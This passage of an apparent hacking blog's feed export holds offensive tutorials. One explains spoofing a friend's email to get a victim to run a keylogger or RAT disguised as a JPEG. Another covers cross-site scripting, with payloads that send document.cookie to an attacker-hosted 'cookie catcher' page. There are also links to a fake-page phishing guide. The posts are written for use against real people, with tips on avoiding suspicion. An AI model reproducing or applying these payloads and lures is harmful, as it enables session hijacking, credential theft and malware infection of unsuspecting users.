&lt;span style=&quot;font-family: inherit; font-size: small; font-weight: normal;&quot;&gt;Phishing is an attempt to criminally and fraudulently acquire sensitive information, such as username, passwords and credit card details, by appearing as a trustworthy entity in an electronic communication. eBay, PayPal and other online banks are common targets Phishing is typically carried out by email or instant messaging and often directs users to enter details at a website&lt;/span&gt;&lt;/h2&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: inherit; font-size: small; font-weight: normal;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-family: inherit; font-size: small; font-weight: normal;&quot;&gt;To Know More Go To:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-family: inherit; font-size: small; font-weight: normal;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;a href=&quot;http://toxiccloud.blogspot.com/2013/07/what-is-phishing.html&quot; target=&quot;_blank&quot;&gt;What is Phishing&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;a href=&quot;http://toxiccloud.blogspot.com/2013/07/how-to-make-phisherfake-page-for-any.html&quot; target=&quot;_blank&quot;&gt;How to make a Phisher/Fake page for any Website&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/472373077659853285/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/ways-to-hack-email.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/472373077659853285'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/472373077659853285'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/ways-to-hack-email.html' title='Ways to Hack An Email'/><author><name>TheKingOfEmAll</name><uri>http://www.blogger.com/profile/18003915218562093391</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='23' height='32' src='http://2.bp.blogspot.com/-p_iX0mZmqhQ/Ueki9hsAo_I/AAAAAAAAAT8/gkwKOC_Ewfo/s220/tumblr_mohaopxcFE1svd9olo1_1280.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3274283599470026861.post-7415260505829451961</id><published>2013-07-21T03:32:00.001-07:00</published><updated>2018-10-07T15:36:41.213-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><title type='text'>How to hack a Facebook account </title><content type='html'>&lt;div dir=&quot;ltr&quot;&gt;
&lt;br /&gt;TUTORIAL: Hack anyone Facebook,email or PC..&lt;br /&gt;This tutorial is like a spreading tutorial way basically. But more precise and powerful&lt;br /&gt;REQUIREMENTS:-&lt;br /&gt;1) A fully FUD server (SERVER BEING FUD is the most important part of the hack)&lt;br /&gt;2) Patience&lt;br /&gt;That&#39;s all...&lt;br /&gt;Now coming to the hack...&lt;br /&gt;there are basically thousands of tutorials in HF about keylogger,RAT,stealer and crypting...&lt;br /&gt;so read one and make your server fully fud...&lt;br /&gt;Now do just as what i say:-&lt;br /&gt;1) go to &quot; http://emailattack.host22.com/emailspoof.php &quot; and leave that tab open&lt;br /&gt;2) now login to your facebook and copy the username of the person(FB username) you want&lt;br /&gt;to hack&lt;br /&gt;like this....&lt;br /&gt;http://imageshack.us/photo/my-images/543/username.png&lt;br /&gt;so basically the name after the http://www.facebook.com/ is the username...&lt;br /&gt;in my example &quot;RANDOM&quot; is the username....&lt;br /&gt;if the link shows url like &quot;https://www.facebook.com/profile.php?id=100003721756694&quot;&lt;br /&gt;then you cannot use this method on them....&lt;br /&gt;3) as you are the friend of the person you must know who he his/her best friend or just&lt;br /&gt;close friend....&lt;br /&gt;so basically get his email id attached to his Facebook like&lt;br /&gt;http://imageshack.us/photo/my-images/152/contactw.png&lt;br /&gt;[this can be hard if you don&#39;t have this person as your friend]&lt;br /&gt;anyways you can ask his/her email id if you know him....&lt;br /&gt;4)Now just open that spoofer tab and paste the info as follows:-&lt;br /&gt;in Spoofed Email: the id you stolen from the contact info: ex: something@anymail.com&lt;br /&gt;in Targets Email: username@facebook.com, ex: random@facebook.com&lt;br /&gt;in Reply Email: same as spoofed email&lt;br /&gt;in message title: hi or whatever&lt;br /&gt;in message body : Hi check out my new pics uploaded here: &quot;link of your key-logger,rat or&lt;br /&gt;whatever&quot;&lt;br /&gt;HE/SHE WILL RECEIVE THAT MESSAGE FROM THE SPOOFED PERSON AND AS HE/SHE IS&lt;br /&gt;HER CLOSE FRIEND SHE WILL DEFINITELY DOWNLOAD AND RUN IT&lt;br /&gt;VICTIM WILL TAKE SOME TIME TO READ THE MESSAGE&amp;gt;DOWNLOAD THE FILE&amp;gt;RUN IT.&lt;br /&gt;THAT&#39;S WHY I SAID PATIENCE IS A REQUIREMENT ....&lt;br /&gt;PRO-TIP:&lt;br /&gt;1) If you are using the message from the example then i suggest you to download some of&lt;br /&gt;the spoofed person(victim friend)&lt;br /&gt;pictures and use icon-changer to change your server icon to JPEG icon and put all that pics&lt;br /&gt;and your server to an .rar file and&lt;br /&gt;upload it to the hosting site....&lt;br /&gt;Lol,,,, no one sees the extension if you do this thing..&lt;br /&gt;2) use rat&#39;s crew extension spoofer to change the extension to JPEG and change server icon&lt;br /&gt;to JPEG too....&lt;br /&gt;IT TOOK ME 2 HOURS TO WRITE THIS TUTORIAL . PLEASE TAKE 10 SECONDS TO SAY&lt;br /&gt;THANKS.&lt;br /&gt;I DONT KNOW WHO IS UNKNOWN1 BUT I LOVE HIM FOR HIS PHP&lt;br /&gt;FILE....&lt;br /&gt;THAT SITE I GAVE YOU IS MY PERSONAL... DOWNLOAD THAT&lt;br /&gt;PHP AND MAKE YOUR OWN SITE IF IN SOME CASE MY WEBSITE&lt;br /&gt;GETS DELETED.&lt;br /&gt;I MADE THAT WEBSITE BY A TUTORIAL POSTED IN HF... IT IS&lt;br /&gt;DELETED NOW SO I DON&#39;T KNOW WHO WAS THE AUTHOR... BUT&lt;br /&gt;ANYWAYS.. A BIG THANKS TO HIM.&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/7415260505829451961/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/how-to-hack-facebook-account.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/7415260505829451961'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/7415260505829451961'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/how-to-hack-facebook-account.html' title='How to hack a Facebook account '/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/15337053438654229797</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total><georss:featurename>Lahore Cantt., Lahore Cantt.</georss:featurename><georss:point>31.516666 74.38333</georss:point></entry><entry><id>tag:blogger.com,1999:blog-3274283599470026861.post-1662173660841419809</id><published>2013-07-20T08:29:00.003-07:00</published><updated>2013-07-29T05:21:00.750-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="web"/><title type='text'>XXS (cross site scripting tut) </title><content type='html'>&lt;div class=&quot;article-header&quot; style=&quot;background-color: white; color: #555555; display: table; font-family: &#39;Helvetica Neue Light&#39;, HelveticaNeue-Light, &#39;Helvetica Neue&#39;, Helvetica, Arial, sans-serif; font-size: 13px; margin: 0px; outline: none; padding: 0px; text-align: center; width: 750px;&quot;&gt;
&lt;h1 class=&quot;title entry-title&quot; itemprop=&quot;name&quot; style=&quot;display: table-cell; font-weight: normal; margin: 0px; padding: 0px 40px 0px 0px; position: relative; vertical-align: middle; width: 710px;&quot;&gt;
&lt;a href=&quot;http://0haxor.blogspot.com/2013/01/complete-xss-tutorial.html&quot; itemprop=&quot;url&quot; rel=&quot;bookmark&quot; style=&quot;color: #d1512a; margin: 0px; outline: none; padding: 0px; text-decoration: none;&quot;&gt;&lt;span style=&quot;color: red; font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Complete XSS Tutorial&lt;/span&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;/div&gt;
&lt;div class=&quot;article-content entry-content&quot; itemprop=&quot;articleBody&quot; style=&quot;background-color: white; clear: both; color: #555555; font-family: &#39;Helvetica Neue Light&#39;, HelveticaNeue-Light, &#39;Helvetica Neue&#39;, Helvetica, Arial, sans-serif; font-size: 13px; line-height: 1.4; margin: 10px auto 5px; outline: none; padding: 0px; text-align: justify;&quot;&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;margin: 0px; outline: none; padding: 0px; text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;text&quot; style=&quot;margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;ol style=&quot;line-height: 19px; list-style-image: initial; list-style-position: initial; margin: 0.5em 0px; outline: none; padding: 0px 0px 0px 2em;&quot;&gt;&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Hello Guys Today i will write a Complete Tutorial on XSS.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;&lt;span style=&quot;color: #333333; margin: 0px; padding: 0px;&quot;&gt;First Of All XSS is in 2 Types,&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: red; margin: 0px; padding: 0px;&quot;&gt;Persistent&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #333333; margin: 0px; padding: 0px;&quot;&gt;and&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: red; margin: 0px; padding: 0px;&quot;&gt;Non-Persistent&lt;/span&gt;&lt;span style=&quot;color: #333333; margin: 0px; padding: 0px;&quot;&gt;&amp;nbsp;type.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;For XSS we will use something called a Cookie Catcher.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Question will be that why we would need someones else cookies?&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;The answer is that we can change our browser&#39;s cookies to login as them!!! So lets call it Session Hijacking.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;First go to a free hosting site like http://www.110mb.com or any other php hosting sites and register there. Then download this cookie catcher and upload it.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Cookie Catcher:&amp;nbsp;&lt;a href=&quot;http://adf.ly/1I5oz&quot; style=&quot;color: #d1512a; margin: 0px; outline: none; padding: 0px; text-decoration: none;&quot;&gt;http://adf.ly/1I5oz&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;What does the cookie catcher do?&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;It grabs the user&#39;s:&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;[*]Cookies&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;[*]IP&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;[*]Referral Link. Which Page is attached to that Link&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;[*]Time And Date&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;color: red; font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Get Vulnerable sites:&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Ok first we need sites that are vulnerable to XSS so it will work on them.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;To test it we will need to add a code after the link.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;I will use this site that many of you probably saw it before.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;&lt;a href=&quot;http://adf.ly/Tdo3&quot; style=&quot;color: #d1512a; margin: 0px; outline: none; padding: 0px; text-decoration: none;&quot;&gt;http://adf.ly/Tdo3&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Now for testing If a site is vulnerable or not you can add these codes:&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;&quot;&amp;gt;&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;&#39;&amp;gt;&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;&quot;&amp;gt;&amp;lt;script&amp;gt;alert(&quot;Test&quot;)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;&#39;&amp;gt;&amp;lt;script&amp;gt;alert(&quot;Test&quot;)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Or a new one which i found out myself in which you can inject HTML:&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;&quot;&amp;gt;&amp;lt;body bgcolor=&quot;FF0000&quot;&amp;gt;&amp;lt;/body&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;&quot;&amp;gt;&amp;lt;iframe src=&quot;www.google.com&quot; height=800 width=800 frameborder=1 align=center&amp;gt;&amp;lt;/iframe&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Then if we see a java script popup:&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Or if you used my testing and you saw the page&#39;s background go black or a page of google opens in that site it means its vulnerable to XSS attack.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;In the end, if your site is http://www.example.com&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;The link to test it would be: http://www.example.com/index.php?id=&quot;&amp;gt;&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;color: red; font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Persistent XSS:&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;In this method we will grab the slave&#39;s cookies with no suspection and completely stealth.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Now assume we have a forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Ok now lets go to this site: http://adf.ly/1I6ns&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Now test and see if the XSS vulnerable test work on it.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;It does!!! And your getting one of the vulnerability&#39;s symptoms. So now lets try to grab it&#39;s cookies. If there is a box to type or submit it, add this:&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;&amp;lt;script&amp;gt;document.location=&quot;www.you.110mb.com/cookie catcher.php?c=&quot; + document.cookie&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;and submit that post in the forum or the comment box also its good to add something before adding the code like: hey i got a problem logging in???&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;so they wont suspect you.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher.php search for cookies.html which is a new file that show you the cookies. Like if your cookie catcher link would be: http://www.example.com/cookie catcher.php&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;The container of the cookies would be: http://www.example.com/cookies.html&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Now visit cookies.html and you would see the session of that cookie!&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Now there is another way for a cookie grabbing drive by, add this code and post it:&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;&amp;lt;iframe frameborder=0 height=0 width=0 src=javascript:void(document.location=&quot;www.you.110mb.com/cookie catcher.php?c=&quot; + document.cookie)&amp;lt;/iframe&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Then post it in the forum or the comment box.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Now this will open a iframe in the page which will allow you to have the same page in that website. If you don&#39;t know about iframes make a new html file in your computer and just do a&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;&amp;lt;iframe src=&quot;www.google.com&quot;&amp;gt;&amp;lt;/iframe&amp;gt; and you will understand iframes more Smile&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;ofc the site Needs to have cookies supported! a blank javascript means you need to go to another site.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;color: red; font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Non-Persistent XSS:&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
